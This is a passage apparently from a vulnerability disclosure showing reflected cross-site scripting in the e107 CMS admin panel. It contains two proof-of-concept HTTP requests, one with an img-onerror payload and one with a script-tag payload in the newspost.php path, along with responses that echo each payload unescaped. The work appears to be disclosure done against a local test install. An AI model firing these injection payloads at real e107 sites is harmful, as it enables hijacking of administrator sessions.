User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close

Response:

HTTP/1.1 200 OK
Date: Thu, 04 May 2023 03:07:35 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "37f107dbe6a998ecf7b71689627c2a56"
Content-Length: 12420
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: hacked">bbbbb</title>
<meta charset='utf-8' />
<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
<!-- *CSS* -->
[...]
<div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path=">
<p>No HTML5 support.</p>
</div>
[...]

# POC 2

URL: http://127.0.0.1/e107/e107_admin/newspost.php
Parameters: Payload in URL

Request:

GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8
Connection: close

Response:

HTTP/1.1 200 OK
Date: Fri, 05 May 2023 06:21:53 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "d127dd6a44a22e093fed60b83bf36af2"
Content-Length: 72914
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>News - List - Admin Area :: hacked">bbbbb</title>
<meta charset='utf-8' />
<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
<!-- *CSS* -->
[...]
<a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h"> <script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ><i class="fa fa-forward"></i></a>
[...]